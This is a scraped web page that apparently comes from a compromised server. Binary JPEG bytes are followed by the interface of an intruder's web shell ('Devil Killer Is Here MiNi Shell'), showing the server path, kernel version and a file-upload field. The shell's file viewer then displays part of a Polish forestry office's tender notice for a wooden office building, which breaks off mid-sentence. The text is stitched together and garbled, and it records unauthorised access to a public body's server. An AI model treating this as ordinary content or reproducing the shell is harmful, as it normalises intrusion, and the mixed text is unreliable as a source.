JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221004/0037543301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku biurowego - kancelarii leśnictw Sowia Góra i Kamień drugie postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO MIĘDZYCHÓD</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przedlesie 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzychód</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 95 748 2091</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miedzychod@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://miedzychod.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku biurowego - kancelarii leśnictw Sowia Góra i Kamień drugie postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-35f1bc28-4351-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00375433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00165217/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa podwójnej kancelarii leśnictwa Sowia Góra i Kamień</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo_miedzychod <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo_miedzychod</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przesyłane dokumenty powinny być<br/>załączone w formie plików w formacie odpowiednio .<br/>png,.jpg,.jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip,.txt,<br/>.ath,.xml,.dwg, .xades, .tar, .7z, .eml, .msg,b)wymagania sprzętowe dla Wykonawcy:przeglądarka<br/>internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58<br/>i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11, lista zalecanych przeglądarek<br/>internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek, system operacyjny Windows 7 i późniejsze,zainstalowane środowisko Java w wersji min.<br/>1.8 (jre),w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do<br/>przeglądarki Szafir SDK Web,oprogramowanie SzafirHost w systemie operacyjnym, stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden systemów<br/>operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje, zainstalowany<br/>program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.Maksyma rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz<br/>do komunikacji wynosi 100 MB. Za pośrednictwem Systemu można przesłać<br/>wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych<br/>plików. Ofertę oraz oświadczenia, składane na podstawie art. 125 ust. 1 PZP (sporządzane wg wzorów<br/>stanowiących odpowiednio załącznik nr 3A i 3B do SWZ), sporządza się, pod rygorem nieważności w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo_miedzychod</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Nadleśniczy Nadleśnictwa Strzelce Krajeńskie. Administrator wyznaczył Inspektora Ochrony<br/>Danych Osobowych p. Karolinę Kaczmarek , z którym w sprawach dotyczących przetwarzania danych<br/>osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem lub<br/>telefonicznie pod numerem +48 91 432 87 12. Pozostałe regulacje dot. RODO znajdują się w pkt. 21<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.32.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową budynku biurowego - kancelarii leśnictw<br/>Sowia Góra i Kamień wraz z zagospodarowaniem terenu oraz z uzyskaniem dla niego ostatecznej lub opatrzonej rygorem<br/>natychmiastowej wykonalności decyzji o pozwoleniu na użytkowanie. Zamawiający wymaga, aby budowa budynku kancelarii<br/>realizowana była w technologii drewnianej z wykorzystaniem prefabrykowanych gotowych elementów (modułów).<br/>Szczegółowy Opis Przedmiotu Zamówienia zawarty jest w dokumentacji projektowej składającej się z:<br/>1) projektu budowlanego -projekt zagospodarowania terenu - stanowiącego załącznik nr 1A do SWZ;<br/>2) projektu budowlanego -projekt architektoniczno-budowlany - stanowiącego załącznik nr 1B do SWZ<br/>3) projektu wykonawczego -projekt zagospodarowania terenu - stanowiącego załącznik nr 1C do SWZ;<br/>4) projektu wykonawczego Tom 2 -projekt architektoniczno-budowlany - stanowiącego załącznik nr 1D do SWZ<br/>5) specyfikacji technicznej wykonania i odbioru robót - stanowiącej załącznik nr 1E do SWZ;<br/>6) przedmiaru robót - stanowiącego załącznik nr 1F do SWZ;<br/>7) pozwolenia na budowę - stanowiącego załącznik nr 1G do SWZ.<br/>Przedmiar robót nie stanowi podstawy do wyceny oferty, ma charakter informacyjny i pomocniczy.<br/>1) do wykonania przedmiotu zamówienia Wykonawca używa własnych narzędzi, materiałów i urządzeń dostarczonych<br/>własnym staraniem;<br/>2) materiały i urządzenia użyte do wykonania przedmiotu zamówienia muszą być zgodne z wymaganiami określonymi w<br/>dokumentacji projektowej oraz muszą być zgodne z polskimi normami, posiadać atesty, aprobaty techniczne, deklaracje<br/>zgodności dopuszczające zastosowanie materiałów w budownictwie. Wszystkie zastosowane materiały muszą być<br/>oferowane w I gatunku.<br/>3) Wykonawca zobowiązany jest uwzględnić w cenie koszty związane z utrzymaniem zaplecza i placu budowy oraz<br/>utylizacją i wywozem odpadów powstałych w trakcie prowadzenia robót;<br/>4) w ramach przedmiotu zamówienia Wykonawca zapewni na własny koszt pełną obsługę geodezyjną w trakcie budowy<br/>oraz powykonawczą inwentaryzację geodezyjną;<br/>5) Wykonawca zobowiązany jest wykonać badanie szczelności budynku metodą ciśnieniową n50 &lt;= 1,5 oraz detekcję<br/>nieszczelności w celu zlokalizowania wszelkich niekontrolowanych przecieków powietrza przez obudowę budynku. Badanie<br/>należy wykonać w trakcie wykonywania budowy, w momencie gdy wszystkie elementy zapewniające szczelność budynku<br/>zostały wykonane, a jeszcze przed pracami wykończeniowymi. W przypadku stwierdzenia nieszczelności należy uszczelnić<br/>budynek w celu uzyskania parametrów szczelności wynikającej z normy dla budynków z wentylacją mechaniczną.<br/>Miejscem realizacji przedmiotu zamówienia będzie teren Nadleśnictwa Międzychód, woj. Wielkopolskie, powiat<br/>międzychodzki, gmina Międzychód, obręb ewidencyjny Międzychód Nadleśnictwo, działka ewidencyjna nr 205/3.<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących przedmiotu<br/>zamówienia. Wykonawca może powierzyć realizację elementów (części) przedmiotu zamówienia podwykonawcom. W<br/>przypadku zamiaru wykonywania przedmiotu zamówienia z udziałem podwykonawców Wykonawca zobowiązany jest do<br/>wskazania w swojej ofercie części zamówienia (zakresów rzeczowych), których wykonanie zamierza powierzyć<br/>podwykonawcom, oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani. Wskazanie takie należy umieścić<br/>na Ofercie. W przypadku braku wskazania w Ofercie podwykonawstwa Wykonawca będzie mógł wprowadzić<br/>podwykonawcę wyłącznie na warunkach określonych w umowie.<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących<br/>czynności wchodzące w zakres realizacji przedmiotu zamówienia:<br/>1) montaż prefabrykowanych elementów drewnianych;<br/>2) roboty w zakresie pokrywania podłóg, kładzenie płytek, glazury i terakoty;<br/>3) roboty tynkarskie i malarskie;<br/>4) roboty izolacyjne;<br/>5) roboty w zakresie stolarki budowlanej;<br/>6) roboty instalacyjne elektryczne;<br/>7) roboty instalacyjne sanitarne;<br/>8) roboty wykończeniowe.<br/>- jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca<br/>1974 r. - Kodeks pracy (tekst jedn.: Dz. U. z 2020 r. poz. 1320 z późn. zm.).<br/>Zamawiający nie wymaga zatrudnienia na podstawie stosunku pracy osób wykonujących samodzielne funkcje techniczne w<br/>budownictwie, tj. kierownika budowy i robót.<br/>Sposób weryfikacji zatrudnienia osób, o których mowa powyżej, uprawnienia Zamawiającego w zakresie kontroli spełniania<br/>przez Wykonawcę wymagań, związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań<br/>określa wzór umowy w sprawie zamówienia publicznego (zał. nr 4 do SWZ).<br/>Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 214 ust. 1) pkt 7) PZP.<br/>Zamawiający nie przewiduje obowiązku odbycia przez Wykonawcę wizji lokalnej oraz sprawdzenia przez wykonawcę<br/>dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego.<br/>Zamawiający wymaga udzielenia na wykonany przedmiot umowy gwarancji jakości i rękojmi za wady na okres minimum 60<br/>miesięcy licząc od dnia podpisania protokołu odbioru końcowego przedmiotu umowy, bez wad istotnych lub więcej – w<br/>przypadku chęci uzyskania przez Wykonawcę dodatkowych punktów przyznawanych w ramach jednego z kryteriów oceny<br/>ofert tj. „Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady” (patrz rozdział 16, pkt 16.2. ppkt 2) SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena – waga 60 %<br/>2) Wydłużenie minimalnego (60 miesięcznego)<br/>okresu gwarancji jakości i rękojmi za wady – waga 40 %<br/>Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla tych kryteriów w %.<br/>2. Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C =Cn/Co x 100 pkt x waga 60 %<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Uzyskana z wyliczenia ilość punktów zostanie ustalona z dokładnością do dwóch miejsc po przecinku, z zachowaniem zasady<br/>zaokrągleń matematycznych.<br/>2) W ramach kryterium „Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady” ocena ofert<br/>zostanie dokonana w następujący sposób:<br/>Do oceny ofert w ramach kryterium „Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady” brany<br/>będzie pod uwagę okres gwarancji jakości i rękojmi za wady na wykonany przedmiot zamówienia podany przez Wykonawcę w<br/>formularzu Oferty (załącznik nr 2 do SWZ). Zaoferowany przez Wykonawcę okres gwarancji jakości i rękojmi za wady nie może być<br/>krótszy niż 60 miesięcy (minimalny termin wymagalny przez Zamawiającego). Wykonawca za dodatkowe 4 miesiące wydłużenia 60<br/>miesięcznego okresu gwarancji jakości i rękojmi za wady uzyska 10 punktów. Wykonawca za dodatkowe 8 miesiące wydłużenia 60<br/>miesięcznego okresu gwarancji jakości i rękojmi za wady uzyska 20 punktów. Wykonawca maksymalnie może wydłużyć okres<br/>gwarancji jakości i rękojmi za wady do 12 miesięcy, co będzie odpowiadało uzyskaniem 40 pkt. Termin dłuższy niż 72 miesiące dla<br/>potrzeb obliczania punktacji będzie traktowany jak 72 miesiące. Wykonawca, który zaoferuje minimalny okres gwarancji jakości i<br/>rękojmi za wady (tj. 60 miesięcy) uzyska 0 pkt. Jeżeli Wykonawca nie poda okresu gwarancji jakości i rękojmi za wady Zamawiający<br/>uzna, że zaoferował minimalny okres gwarancji i rękojmi za wady (tj. 60 miesięcy) i przyzna mu 0 punktów w kryterium „Wydłużenie<br/>minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady”. Oferta z krótszym okresem gwarancji jakości i rękojmi<br/>za wady niż 60 miesięcy jako nieodpowiadająca warunkom zamówienia zostanie odrzucona. Okres gwarancji jakości i rękojmi za<br/>wady podany w Ofercie zostanie wpisany do umowy.<br/>Punktacja w ramach kryterium „Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady” przyznana<br/>zostanie w następujący sposób:<br/>Okres gwarancji jakości i rękojmi za wady min. 60 miesięcy = 0 pkt.<br/>Okres gwarancji jakości i rękojmi za wady 64miesiące = 10 pkt.<br/>Okres gwarancji jakości i rękojmi za wady 68 miesięcy = 20 pkt.<br/>Okres gwarancji jakości i rękojmi za wady 72 miesiące = 40 pkt.<br/>3. Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów w w/w kryteriach oceny<br/>ofert. Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w<br/>obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej.<br/>Warunek dotyczący sytuacji finansowej zostanie uznany za spełniony, jeśli Wykonawca wykaże, że posiada zdolność<br/>kredytową lub środki finansowe o wartości nie mniejszej niż 200.000,00 zł (słownie: dwieście tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej.<br/>a) warunek dotyczący zdolności technicznej lub zawodowej, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia w którym upływa termin składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę budowlaną (przez robotę<br/>budowlaną rozumie się wykonanie robót na podstawie jednej umowy) polegającą na budowie budynku w technologii<br/>drewnianej (o drewnianej konstrukcji ścian, stropów oraz dachu) z wykorzystaniem prefabrykowanych gotowych elementów<br/>(modułów). na kwotę nie mniejszą niż 300 000,00 zł brutto (słownie: trzysta tysięcy złotych 00/100),<br/>Przez pojęcie „budowa” rozumie się wykonanie obiektu budowlanego w określonym miejscu a także odbudowę, rozbudowę,<br/>nadbudowę obiektu budowlanego.<br/>Jeżeli Wykonawca zamierza się posłużyć doświadczeniem zrealizowania zadania w systemie 